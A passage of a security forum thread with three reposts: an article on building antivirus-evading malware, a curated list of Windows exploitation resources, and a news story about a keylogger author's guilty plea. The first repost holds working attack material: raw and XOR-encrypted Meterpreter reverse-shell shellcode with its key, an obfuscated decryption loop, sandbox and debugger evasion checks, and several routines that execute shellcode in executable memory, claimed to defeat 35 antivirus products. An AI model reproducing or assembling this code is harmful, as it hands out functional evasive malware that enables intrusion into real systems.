0xe2, 0xf2, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x33, 0x32, 0x00, 0x00, 0x68, 0x77, 0x73, 0x32, 0x5f, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xb8, 0x90, 0x01, 0x00, 0x00, 0x29, 0xc4, 0x54, 0x50, 0x68, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x05, 0x68, 0x7f, 0x00, 0x00, 0x01, 0x68, 0x02, 0x00, 0x11, 0x5c, 0x89, 0xe6, 0x50, 0x50, 0x50, 0x50, 0x40, 0x50, 0x40, 0x50, 0x68, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x97, 0x6a, 0x10, 0x56, 0x57, 0x68, 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0c, 0xff, 0x4e, 0x08, 0x75, 0xec, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x00, 0x6a, 0x04, 0x56, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x8b, 0x36, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x56, 0x6a, 0x00, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0x53, 0x6a, 0x00, 0x56, 0x53, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x01, 0xc3, 0x29, 0xc6, 0x75, 0xee, 0xc3 }; For keeping the entropy and size in appropriate value i will pass this shellcode to simple xor cipher with a multi byte key, xor is not an encryption standard like RC4 or blowfish but we don’t need a strong encryption anyway, AV products is not going to try to decrypt the shellcode, making it unreadable and undetectable for static string analysis is enough, also using xor makes decryption process much more faster and avoiding the encryption libraries in code will reduce the size a lot. This is the same meterpreter code xor ciphered with key. unsigned char Shellcode[] = { 0xfb, 0xcd, 0x8d, 0x9e, 0xba, 0x42, 0xe1, 0x93, 0xe2, 0x14, 0xcf, 0xfa, 0x31, 0x12, 0xb1, 0x91, 0x55, 0x29, 0x84, 0xcc, 0xae, 0xc9, 0xf3, 0x32, 0x08, 0x92, 0x45, 0xb8, 0x8b, 0xbd, 0x2d, 0x26, 0x66, 0x59, 0x0d, 0xb2, 0x9a, 0x83, 0x4e, 0x17, 0x06, 0xe2, 0xed, 0x6c, 0xe8, 0x15, 0x0a, 0x48, 0x17, 0xae, 0x45, 0xa2, 0x31, 0x0e, 0x90, 0x62, 0xe4, 0x6d, 0x0e, 0x4f, 0xeb, 0xc9, 0xd8, 0x3a, 0x06, 0xf6, 0x84, 0xd7, 0xa2, 0xa1, 0xbb, 0x53, 0x8c, 0x11, 0x84, 0x9f, 0x6c, 0x73, 0x7e, 0xb6, 0xc6, 0xea, 0x02, 0x9f, 0x7d, 0x7a, 0x61, 0x6f, 0xf1, 0x26, 0x72, 0x66, 0x81, 0x3f, 0xa5, 0x6f, 0xe3, 0x7d, 0x84, 0xc6, 0x9e, 0x43, 0x52, 0x7c, 0x8c, 0x29, 0x44, 0x15, 0xe2, 0x5e, 0x80, 0xc9, 0x8c, 0x21, 0x84, 0x9f, 0x6a, 0xcb, 0xc5, 0x3e, 0x23, 0x7e, 0x54, 0xff, 0xe3, 0x18, 0xd0, 0xe5, 0xe7, 0x7a, 0x50, 0xc4, 0x31, 0x50, 0x6a, 0x97, 0x5a, 0x4d, 0x3c, 0xac, 0xba, 0x42, 0xe9, 0x6d, 0x74, 0x17, 0x50, 0xca, 0xd2, 0x0e, 0xf6, 0x3c, 0x00, 0xda, 0xda, 0x26, 0x2a, 0x43, 0x81, 0x1a, 0x2e, 0xe1, 0x5b, 0xce, 0xd2, 0x6b, 0x01, 0x71, 0x07, 0xda, 0xda, 0xf4, 0xbf, 0x2a, 0xfe, 0x1a, 0x07, 0x24, 0x67, 0x9c, 0xba, 0x53, 0xdd, 0x93, 0xe1, 0x75, 0x5f, 0xce, 0xea, 0x02, 0xd1, 0x5a, 0x57, 0x4d, 0xe5, 0x91, 0x65, 0xa2, 0x7e, 0xcf, 0x90, 0x4f, 0x1f, 0xc8, 0xed, 0x2a, 0x18, 0xbf, 0x73, 0x44, 0xf0, 0x4b, 0x3f, 0x82, 0xf5, 0x16, 0xf8, 0x6b, 0x07, 0xeb, 0x56, 0x2a, 0x71, 0xaf, 0xa5, 0x73, 0xf0, 0x4b, 0xd0, 0x42, 0xeb, 0x1e, 0x51, 0x72, 0x67, 0x9c, 0x63, 0x8a, 0xde, 0xe5, 0xd2, 0xae, 0x39, 0xf4, 0xfa, 0x2a, 0x81, 0x0a, 0x07, 0x25, 0x59, 0xf4, 0xba, 0x2a, 0xd9, 0xbe, 0x54, 0xc0, 0xf0, 0x4b, 0x29, 0x11, 0xeb, 0x1a, 0x51, 0x76, 0x58, 0xf6, 0xb8, 0x9b, 0x49, 0x45, 0xf8, 0xf0, 0x0e, 0x5d, 0x93, 0x84, 0xf4, 0xf4, 0xc4 }; unsigned char Key[] = { 0x07, 0x25, 0x0f, 0x9e, 0xba, 0x42, 0x81, 0x1a }; Because of we are writing a new piece of malware, our malware’s hash signature will not be known by the anti virus products, so we don’t need to worry about signature based detection, we will encrypt our shellcode and obfuscate our anti detection/reverse engineering and decryption functions also these will be enough for bypassing static/heuristic analysis phase, there is only one more phase we need to bypass and it is the dynamic analysis phase,most important part is the success of the “AV detect” function, before starting to write the function we need to understand how heuristic engines of AV products works. Heuristic Engines Heuristic engines are basically statistical and rule based analyze mechanisms. Their main purpose is detecting new generation(previously unknown) viruses by categorizing and giving threat/risk grades to code fragments according to predefined criterias, even when a simple hello world program scanned by AV products, heuristic engine decides on a threat/risk score if the score is higher then thresholds then the file gets marked as malicious. Heuristic engines are the most advanced part of AV products they use significant amount of rules and criterias, since no anti virus company releases blueprints or documentation about their heuristic engines all known selective criterias about their threat/risk grading policy are found with trial and error. Some of the known rules about threat grading; – Decryption loop detected – Reads active computer name – Reads the cryptographic machine GUID – Contacts random domain names – Reads the windows installation date – Drops executable files – Found potential IP address in binary memory – Modifies proxy settings – Installs hooks/patches the running process – Injects into explorer – Injects into remote process – Queries process information – Sets the process error mode to suppress error box – Unusual entrophy – Possibly checks for the presence of antivirus engine – Monitors specific registry key for changes – Contains ability to elevate privileges – Modifies software policy settings – Reads the system/video BIOS version – Endpoint in PE header is within an uncommon section – Creates guarded memory regions – Spawns a lot of processes – Tries to sleep for a long time – Unusual sections – Reads windows product id – Contains decryption loop – Contains ability to start/interact device drivers – Contains ability to block user input … When writing our AV detect and Decrypt Shellcode functions we have to be careful about all this rules. Decrypt Shellcode: Obfuscating the decryption mechanism is vital, most of AV heuristic engines are able to detect decryption loops inside PE files, after the huge increase on ransomware cases even some heuristic engines are build mainly just for finding encryption/decryption routines, after they detect a decryption routine, some scanners waits until ECX register to be “0” most of the time that indicates the end of loop, after they reach the end of the decryption loop they will re analyze the decrypted content of the file. This will be the “Decrypt Shellcode” function, void DecryptShellcode() { for (int i = 0; i < sizeof(Shellcode); i++) { __asm { PUSH EAX XOR EAX, EAX JZ True1 __asm __emit(0xca) __asm __emit(0x55) __asm __emit(0x78) __asm __emit(0x2c) __asm __emit(0x02) __asm __emit(0x9b) __asm __emit(0x6e) __asm __emit(0xe9) __asm __emit(0x3d) __asm __emit(0x6f) True1: POP EAX } Shellcode[i] = (Shellcode[i] ^ Key[(i % sizeof(Key))]); __asm { PUSH EAX XOR EAX, EAX JZ True2 __asm __emit(0xd5) __asm __emit(0xb6) __asm __emit(0x43) __asm __emit(0x87) __asm __emit(0xde) __asm __emit(0x37) __asm __emit(0x24) __asm __emit(0xb0) __asm __emit(0x3d) __asm __emit(0xee) True2: POP EAX } } } It is a for loop that makes logical xor operation between a shellcode byte and a key byte, below and above assembly blocks literally does noting, they cover the logical xor operation with random bytes and jumps over them. Because of we are not using any advanced decryption mechanism this will be enough for obfuscating “Decrypt Shellcode” function. Dynamic Analysis Detection: Also while writing the sandbox detection mechanism we need to obfuscate our methods, if the heuristic engine detects any sign of anti reverse engineering methods it would be very bad for malware’s threat score. Is Debugger Present: Our first AV detection mechanism will be checking for debugger in our process There is a windows API function for this operation it ”Determines whether the calling process is being debugged by a user-mode debugger.” but we will not use it because of most AV products are monitoring the win API calling statements, they probably detect and treat this function as a anti reverse engineering method. Instead of using the win API function we will go and look at the “BeingDebuged” byte at PEB block. // bool WINAPI IsDebuggerPresent(void); __asm { CheckDebugger: PUSH EAX // Save the EAX value to stack MOV EAX, DWORD PTR FS : [0x18] // Get PEB structure address MOV EAX, DWORD PTR[EAX + 0x30] // Get being debugged byte CMP BYTE PTR[EAX + 2], 0 // Check if being debuged byte is set JNE CheckDebugger // If debugger present check again POP EAX // Put back the EAX value } With some inline assembly this piece of code points a pointer to the BeingDebuged byte in PEB block, if debugger present it will check again until a overflow occurs in stack, when an overflow occurs the stack canaries will trigger an exception and process will be closed, this is the shortest way to exit the program. Manually checking the BeingDebuged byte will bypass good amount of AV product but still some AV products have taken measures about this issue so we need to obfuscate the code for avoiding the static string analysis. __asm { CheckDebugger: PUSH EAX MOV EAX, DWORD PTR FS : [0x18] __asm { PUSH EAX XOR EAX, EAX JZ J __asm __emit(0xea) J: POP EAX } MOV EAX, DWORD PTR[EAX + 0x30] __asm { PUSH EAX XOR EAX, EAX JZ J2 __asm __emit(0xea) J2: POP EAX } CMP BYTE PTR[EAX + 2], 0 __asm { PUSH EAX XOR EAX, EAX JZ J3 __asm __emit(0xea) J3: POP EAX } JNE CheckDebugger POP EAX } I have added jump instruction after all operation, this will not effect out purpose but adding garbage bytes between jumps will obfuscate the code and avoid static string filters. Load Fake Library: This method we will try to load a non existing dll on runtime. Normally when we try to load a non existing dll HISTENCE returns NULL, but some dynamic analysis mechanisms in AV products allows such cases in order to further investigate the execution flow of the program. bool BypassAV(char const * argv[]) { HINSTANCE DLL = LoadLibrary(TEXT("fake.dll")); if (DLL != NULL) { BypassAV(argv); } Get Tick Count: In this method we will be exploiting the time deadline of AV products. In most cases AV scanners are being designed for end user, they need to be user friendly and suitable for daily usage this means they can’t spend too much time for scanning files they need to scan files as quickly as possible. At first malware developers used “sleep()” function for waiting until the scan complete, but nowadays this trick almost never works, every AV product skips the sleep function when they encountered one. We will use this against them , below code uses a win API function called “GetThickCount()” this function “Retrieves the number of milliseconds that have elapsed since the system was started, up to 49.7 days.” we will use it to get the time passed since OS booted, then try to sleep 1 second, after sleep function we will check weather sleep function is skipped or not by comparing the two GetTickCout() value. int Tick = GetTickCount(); Sleep(1000); int Tac = GetTickCount(); if ((Tac - Tick) < 1000) { return false; } Number Of Cores: This method will simply check the number of processor cores on the system. Since AV products can’t afford allocating too much resource from host computer we can check the core number in order to determine are we in a sandbox or not. Even some AV products does not support multi core processing so they shouldn’t be able to reserve more than 1 processor core to their sandbox environment. SYSTEM_INFO SysGuide; GetSystemInfo(&SysGuide); int CoreNum = SysGuide.dwNumberOfProcessors; if (CoreNum < 2) { return false; } Huge Memory Allocations: This method also exploits the time deadline on each AV scan, we simply allocate nearly 100 Mb of memory then we will fill it with NULL bytes, at the end we will free it. char * Memdmp = NULL; Memdmp = (char *)malloc(100000000); if (Memdmp != NULL) { memset(Memdmp, 00, 100000000); free(Memdmp); } When the programs memory starts to grow on runtime eventually AV scanners will end the scan for the sake of not to spend too much time on a file, this method can be used multiple times. This is a very primitive and old technique but it still bypasses good amount of scanners. Trap Flag Manipulation: The trap flag is used for tracing the program. If this flag is set every instruction will raise “SINGLE_STEP” exception.Trap flag can be manipulated in order thwart tracers. We can manipulate the trap flag with below code __asm { PUSHF // Push all flags to stack MOV DWORD [ESP], 0x100 // Set 0x100 to the last flag on the stack POPF // Put back all flags register values } Mutex Triggered WinExec: This method is very promising because of its simplicity, we create a condition for checking whether a certain mutex object already exists on the system or not. HANDLE AmberMutex = CreateMutex(NULL, TRUE, "FakeMutex"); if(GetLastError() != ERROR_ALREADY_EXISTS){ WinExec(argv[0],0); } If “CreateMutex” function does not return already exists error we execute the malware binary again, since most of the AV products don’t let programs witch are dynamically analyzing to start new processes or access the files outside the AV sandbox, when the already exist error occurs execution of the decrypt function may start. There are much more creative ways of mutex usage in anti detection. Proper Ways To Execute Shellcodes Starting with Windows Vista, Microsoft introduced Data Execution Prevention or DEP[8], a security feature that can help prevent damage to your computer by monitoring programs from time to time. Monitoring ensures that running program uses system memory efficiently. If there is any instance of a program on your computer using memory incorrectly, DEP notices it, closes the program and notifies you. That means you can’t just put some bytes to an char array and execute it, you need to allocate a memory region with read,write and execute flags using windows API functions. Microsoft has several memory manipulation API functions for reserving memory pages, most of the common malware in the field uses the “VirtualAlloc” function for reserving memory pages, as you can guess common usage of functions helps AV products with defining detection rules, using other memory manipulation functions will also do the trick and they may attract less attention. I will list several shellcode execution method with different memory manipulation API function, HeapCreate/HeapAlloc: Windows also allows creating RWE heap regions. void ExecuteShellcode(){ HANDLE HeapHandle = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof(Shellcode), sizeof(Shellcode)); char * BUFFER = (char*)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, sizeof(Shellcode)); memcpy(BUFFER, Shellcode, sizeof(Shellcode)); (*(void(*)())BUFFER)(); } LoadLibrary/GetProcAddress: LoadLibrary and GetProcAddress win api function combination allows us to use all other win api functions, with this usage there will be no direct call to the memory manipulation function and malware will probably be less attractive. void ExecuteShellcode(){ HINSTANCE K32 = LoadLibrary(TEXT("kernel32.dll")); if(K32 != NULL){ MYPROC Allocate = (MYPROC)GetProcAddress(K32, "VirtualAlloc"); char* BUFFER = (char*)Allocate(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(BUFFER, Shellcode, sizeof(Shellcode)); (*(void(*)())BUFFER)(); } } GetModuleHandle/GetProcAddress: This method does not even uses the LoadLibrary function it takes advantage of already loaded kernel32.dll, GetModuleHandle function retrieves the module handle from an already loaded dll, this method is possibly one of the most silent way to execute shellcode. void ExecuteShellcode(){ MYPROC Allocate = (MYPROC)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc"); char* BUFFER = (char*)Allocate(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(BUFFER, Shellcode, sizeof(Shellcode)); (*(void(*)())BUFFER)(); } Multi Threading It is always harder to reverse engineer multi threaded PE files, it is also challenging for AV products, multi threading approach can be used with all execution methods above so instead of just pointing a function pointer to shellcode and executing it creating a new thread will complicate things for AV scanners plus it allow us to keep executing the “AV Detect” function while executing the shellcode at same time. void ExecuteShellcode(){ char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(BUFFER, Shellcode, sizeof(Shellcode)); CreateThread(NULL,0,LPTHREAD_START_ROUTINE(BUFFER),NULL,0,NULL); while(TRUE){ BypassAV(argv); } } Above code executes the shellcode with creating a new thread, just after creating the thread there is a infinite whlie loop that is executing bypass av function, this approach will almost double the effect of our bypass av function, bypass AV function will be keep checking for sandbox and dynamic analysis signs while shellcode runs, this is also vital for bypassing some advanced heuristic engines that waits until the execution of the shellcode. Conclusion Towards the end there are few more thinks that needs to be covered about compiling the malware, when compiling the source, safeguards like stack savers need to be on and striping the symbols is vital for hardening the reverse engineering process of our malware and reducing the size, compiling on visual studio is recommended because of the inline assembly syntax that used in this paper. When all of this methods combined, generated malware is able to bypass 35 most advanced AV product. PoC The Meterpreter created by using the techniques we have described in this article shows how our malware produces results in real systems. Sooner or later this methods also going to expire, but there will always be more ways to bypass AV products. sursa: https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/ part2: https://pentest.blog/art-of-anti-detection-2-pe-backdoor-manufacturing/
      • 3
      • Upvote
  18. Awesome Windows Exploitation A curated list of awesome Windows Exploitation resources, and shiny things. There is no pre-established order of items in each category, the order is for contribution. If you want to contribute, please read the guide. Table of Contents Windows stack overflows Windows heap overflows Kernel based Windows overflows Return Oriented Programming Windows memory protections Bypassing filter and protections Typical windows exploits Exploit development tutorial series Corelan Team Fuzzysecurity Securitysift Whitehatters Academy TheSprawl Tools Windows stack overflows Stack Base Overflow Articles. Win32 Buffer Overflows (Location, Exploitation and Prevention) - by Dark spyrit [1999] Writing Stack Based Overflows on Windows - by Nish Bhalla’s [2005] Stack Smashing as of Today - by Hagen Fritsch [2009] SMASHING C++ VPTRS - by rix [2000] Windows heap overflows Heap Base Overflow Articles. Third Generation Exploitation smashing heap on 2k - by Halvar Flake [2002] Exploiting the MSRPC Heap Overflow Part 1 - by Dave Aitel (MS03-026) [September 2003] Exploiting the MSRPC Heap Overflow Part 2 - by Dave Aitel (MS03-026) [September 2003] Windows heap overflow penetration in black hat - by David Litchfield [2004] Glibc Adventures: The Forgotten Chunk - by François Goichon [2015] Pseudomonarchia jemallocum - by argp & huku The House Of Lore: Reloaded - by blackngel [2010] Malloc Des-Maleficarum - by blackngel [2009] free() exploitation technique - by huku Understanding the heap by breaking it - by Justin N. Ferguson [2007] The use of set_head to defeat the wilderness - by g463 The Malloc Maleficarum - by Phantasmal Phantasmagoria [2005] Exploiting The Wilderness - by Phantasmal Phantasmagoria [2004] Advanced Doug lea's malloc exploits - by jp Kernel based Windows overflows Kernel Base Exploit Development Articles. How to attack kernel based vulns on windows was done - by a Polish group called “sec-labs” [2003] Sec-lab old whitepaper Sec-lab old exploit Windows Local Kernel Exploitation (based on sec-lab research) - by S.K Chong [2004] How to exploit Windows kernel memory pool - by SoBeIt [2005] Exploiting remote kernel overflows in windows - by Eeye Security Kernel-mode Payloads on Windows in uninformed - by Matt Miller Exploiting 802.11 Wireless Driver Vulnerabilities on Windows BH US 2007 Attacking the Windows Kernel Remote and Local Exploitation of Network Drivers Exploiting Comon Flaws In Drivers I2OMGMT Driver Impersonation Attack Real World Kernel Pool Exploitation Exploit for windows 2k3 and 2k8 Alyzing local privilege escalations in win32k Intro to Windows Kernel Security Development There’s a party at ring0 and you’re invited Windows kernel vulnerability exploitation A New CVE-2015-0057 Exploit Technology - by Yu Wang [2016] Exploiting CVE-2014-4113 on Windows 8.1 - by Moritz Jodeit [2016] Easy local Windows Kernel exploitation - by Cesar Cerrudo [2012] Windows Kernel Exploitation - by Simone Cardona 2016 Return Oriented Programming The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls Blind return-oriented programming Sigreturn-oriented Programming Jump-Oriented Programming: A New Class of Code-Reuse Attack Out of control: Overcoming control-flow integrity ROP is Still Dangerous: Breaking Modern Defenses Loop-Oriented Programming(LOP): A New Code Reuse Attack to Bypass Modern Defenses - by Bingchen Lan, Yan Li, Hao Sun, Chao Su, Yao Liu, Qingkai Zeng [2015] Systematic Analysis of Defenses Against Return-Oriented Programming -by R. Skowyra, K. Casteel, H. Okhravi, N. Zeldovich, and W. Streilein [2013] Return-oriented programming without returns -by S.Checkoway, L. Davi, A. Dmitrienko, A. Sadeghi, H. Shacham, and M. Winandy [2010] Jump-oriented programming: a new class of code-reuse attack -by T. K. Bletsch, X. Jiang, V. W. Freeh, and Z. Liang [2011] Stitching the gadgets: on the ineffectiveness of coarse-grained control-flow integrity protection - by L. Davi, A. Sadeghi, and D. Lehmann [2014] Size does matter: Why using gadget-chain length to prevent code-reuse attacks is hard - by E. Göktas, E.Athanasopoulos, M. Polychronakis, H. Bos, and G.Portokalidis [2014] Buffer overflow attacks bypassing DEP (NX/XD bits) – part 1 - by Marco Mastropaolo [2005] Buffer overflow attacks bypassing DEP (NX/XD bits) – part 2 - by Marco Mastropaolo [2005] Practical Rop - by Dino Dai Zovi [2010] Exploitation with WriteProcessMemory - by Spencer Pratt [2010] Exploitation techniques and mitigations on Windows - by skape A little return oriented exploitation on Windows x86 – Part 1 - by Harmony Security and Stephen Fewer [2010] A little return oriented exploitation on Windows x86 – Part 2 - by Harmony Security and Stephen Fewer [2010] Windows memory protections Windows memory protections Introduction Articles. Data Execution Prevention /GS (Buffer Security Check) /SAFESEH ASLR SEHOP Bypassing filter and protections Windows memory protections Bypass Methods Articles. Third Generation Exploitation smashing heap on 2k - by Halvar Flake [2002] Creating Arbitrary Shellcode In Unicode Expanded Strings - by Chris Anley Advanced windows exploitation - by Dave Aitel [2003] Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server - by David Litchfield Reliable heap exploits and after that Windows Heap Exploitation (Win2KSP0 through WinXPSP2) - by Matt Conover in cansecwest 2004 Safely Searching Process Virtual Address Space - by Matt Miller [2004] IE exploit and used a technology called Heap Spray Bypassing hardware-enforced DEP - by Skape (Matt Miller) and Skywing (Ken Johnson) [October 2005] Exploiting Freelist[0] On XP Service Pack 2 - by Brett Moore [2005] Kernel-mode Payloads on Windows in uninformed Exploiting 802.11 Wireless Driver Vulnerabilities on Windows Exploiting Comon Flaws In Drivers Heap Feng Shui in JavaScript by Alexander sotirov [2007] Understanding and bypassing Windows Heap Protection - by Nicolas Waisman [2007] Heaps About Heaps - by Brett moore [2008] Bypassing browser memory protections in Windows Vista - by Mark Dowd and Alex Sotirov [2008] Attacking the Vista Heap - by ben hawkes [2008] Return oriented programming Exploitation without Code Injection - by Hovav Shacham (and others ) [2008] Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8 - by Cesar Cerrudo [2008] Defeating DEP Immunity Way - by Pablo Sole [2008] Practical Windows XP2003 Heap Exploitation - by John McDonald and Chris Valasek [2009] Bypassing SEHOP - by Stefan Le Berre Damien Cauquil [2009] Interpreter Exploitation : Pointer Inference and JIT Spraying - by Dionysus Blazakis[2010] Write-up of Pwn2Own 2010 - by Peter Vreugdenhil All in one 0day presented in rootedCON - by Ruben Santamarta [2010] DEP/ASLR bypass using 3rd party - by Shahin Ramezany [2013] Typical windows exploits Real-world HW-DEP bypass Exploit - by Devcode Bypassing DEP by returning into HeapCreate - by Toto First public ASLR bypass exploit by using partial overwrite - by Skape Heap spray and bypassing DEP - by Skylined First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability Exploit codes of bypassing browsers memory protections PoC’s on Tokken TokenKidnapping . PoC for 2k3 -part 1 - by Cesar Cerrudo PoC’s on Tokken TokenKidnapping . PoC for 2k8 -part 2 - by Cesar Cerrudo An exploit works from win 3.1 to win 7 - by Tavis Ormandy KiTra0d Old ms08-067 metasploit module multi-target and DEP bypass PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass SMBv2 Exploit - by Stephen Fewer Microsoft IIS 7.5 remote heap buffer overflow - by redpantz Browser Exploitation Case Study for Internet Explorer 11 - by Moritz Jodeit [2016] Exploit development tutorial series Exploid Development Tutorial Series Base on Windows Operation System Articles. Corelan Team Exploit writing tutorial part 1 : Stack Based Overflows Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode Exploit writing tutorial part 3 : SEH Based Exploits Exploit writing tutorial part 3b : SEH Based Exploits – just another example Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc Exploit writing tutorial part 8 : Win32 Egg Hunting Exploit writing tutorial part 9 : Introduction to Win32 shellcoding Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s Cube Exploit writing tutorial part 11 : Heap Spraying Demystified Fuzzysecurity Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap Chapter 1: Vanilla EIP Part 9: Spraying the Heap Chapter 2: Use-After-Free Part 10: Kernel Exploitation -> Stack Overflow Part 11: Kernel Exploitation -> Write-What-Where Part 12: Kernel Exploitation -> Null Pointer Dereference Part 13: Kernel Exploitation -> Uninitialized Stack Variable Part 14: Kernel Exploitation -> Integer Overflow Part 15: Kernel Exploitation -> UAF Part 16: Kernel Exploitation -> Pool Overflow Part 17: Kernel Exploitation -> GDI Bitmap Abuse (Win7-10 32/64bit) Heap Overflows For Humans 101 Heap Overflows For Humans 102 Heap Overflows For Humans 102.5 Heap Overflows For Humans 103 Heap Overflows For Humans 103.5 Securitysift Windows Exploit Development – Part 1: The Basics Windows Exploit Development – Part 2: Intro to Stack Based Overflows Windows Exploit Development – Part 3: Changing Offsets and Rebased Modules Windows Exploit Development – Part 4: Locating Shellcode With Jumps Windows Exploit Development – Part 5: Locating Shellcode With Egghunting Windows Exploit Development – Part 6: SEH Exploits Windows Exploit Development – Part 7: Unicode Buffer Overflows Whitehatters Academy Intro to Windows kernel exploitation 1/N: Kernel Debugging Intro to Windows kernel exploitation 2/N: HackSys Extremely Vulnerable Driver Intro to Windows kernel exploitation 3/N: My first Driver exploit Intro to Windows kernel exploitation 3.5/N: A bit more of the HackSys Driver Backdoor 103: Fully Undetected Backdoor 102 Backdoor 101 TheSprawl corelan - integer overflows - exercise solution heap overflows for humans - 102 - exercise solution exploit exercises - protostar - final levels exploit exercises - protostar - network levels exploit exercises - protostar - heap levels exploit exercises - protostar - format string levels exploit exercises - protostar - stack levels open security training - introduction to software exploits - uninitialized variable overflow open security training - introduction to software exploits - off-by-one open security training - introduction to re - bomb lab secret phase open security training - introductory x86 - buffer overflow mystery box corelan - tutorial 10 - exercise solution corelan - tutorial 9 - exercise solution corelan - tutorial 7 - exercise solution getting from seh to nseh corelan - tutorial 3b - exercise solution Tools Disassemblers, debuggers, and other static and dynamic analysis tools. angr - Platform-agnostic binary analysis framework developed at UCSB's Seclab. BARF - Multiplatform, open source Binary Analysis and Reverse engineering Framework. binnavi - Binary analysis IDE for reverse engineering based on graph visualization. Bokken - GUI for Pyew and Radare. Capstone - Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages. codebro - Web based code browser using clang to provide basic code analysis. dnSpy - .NET assembly editor, decompiler and debugger. Evan's Debugger (EDB) - A modular debugger with a Qt GUI. GDB - The GNU debugger. GEF - GDB Enhanced Features, for exploiters and reverse engineers. hackers-grep - A utility to search for strings in PE executables including imports, exports, and debug symbols. IDA Pro - Windows disassembler and debugger, with a free evaluation version. Immunity Debugger - Debugger for malware analysis and more, with a Python API. ltrace - Dynamic analysis for Linux executables. objdump - Part of GNU binutils, for static analysis of Linux binaries. OllyDbg - An assembly-level debugger for Windows executables. PANDA - Platform for Architecture-Neutral Dynamic Analysis PEDA - Python Exploit Development Assistance for GDB, an enhanced display with added commands. pestudio - Perform static analysis of Windows executables. Process Monitor - Advanced monitoring tool for Windows programs. Pyew - Python tool for malware analysis. Radare2 - Reverse engineering framework, with debugger support. SMRT - Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis. strace - Dynamic analysis for Linux executables. Udis86 - Disassembler library and tool for x86 and x86_64. Vivisect - Python tool for malware analysis. X64dbg - An open-source x64/x32 debugger for windows. Sursa: https://github.com/enddo/awesome-windows-exploitation
      • 4
      • Upvote
      • Thanks
  19. A 21-year-old former Langley High School student, who won a Programmer of the Year Award in high school, pleaded guilty on Friday to charges of developing and selling custom key-logging malware that infected thousands of victims. Zachary Shames from Virginia pleaded guilty in a federal district court and now faces a maximum penalty of up to 10 years in prison for his past deeds. Shames was arrested this summer while he was working as a technical intern at Northrop Grumman, a security and defense government contractor, developing front-end site code and backend Java software and managing a MySQL database, according to what appears on his Linkedin page. According to a press release from the U.S. Department of Justice, Shames developed a keylogger in 2013 that allowed users to steal sensitive information, including passwords and banking credentials, from a victim's computer, while he was still a high school student in 2013. Keylogger is malicious software designed to record every keystroke on a victim's computer. Shames developed the first versions of now-defunct keylogger known as Limitless Logger Pro, which he sold for $35 on the infamous Hack Forums, according to an anonymous security researcher quoted by Motherboard. Shames "continued to modify and market the illegal product from his college dorm room," at James Madison University in Harrisonburg, Va. and sold it to more than 3,000 people who, in turn, infected over 16,000 victims, the U.S. Attorney's Office said. The keylogger malware developed by Shames slowly turned out into a powerful tool. According to TrendMicro (pdf), apart from key-logging, Limitless KeyLogger can also recover account names and passwords from many popular applications, such as Apple Safari, Firefox, Opera, Google Chrome, Bitcoin wallets, Core FTP, DynDNS, FileZilla, Internet Download Manager, Internet Explorer, Spotify, and more. Shames pleaded guilty in an Alexandria courtroom, and Judge Liam O'Grady accepted his plea. Shames now faces a maximum penalty of up to 10 years in prison and has been sentenced to be scheduled for June 16, 2017. Sursa: http://thehackernews.com/2017/01/limitless-keylogger-pro.html
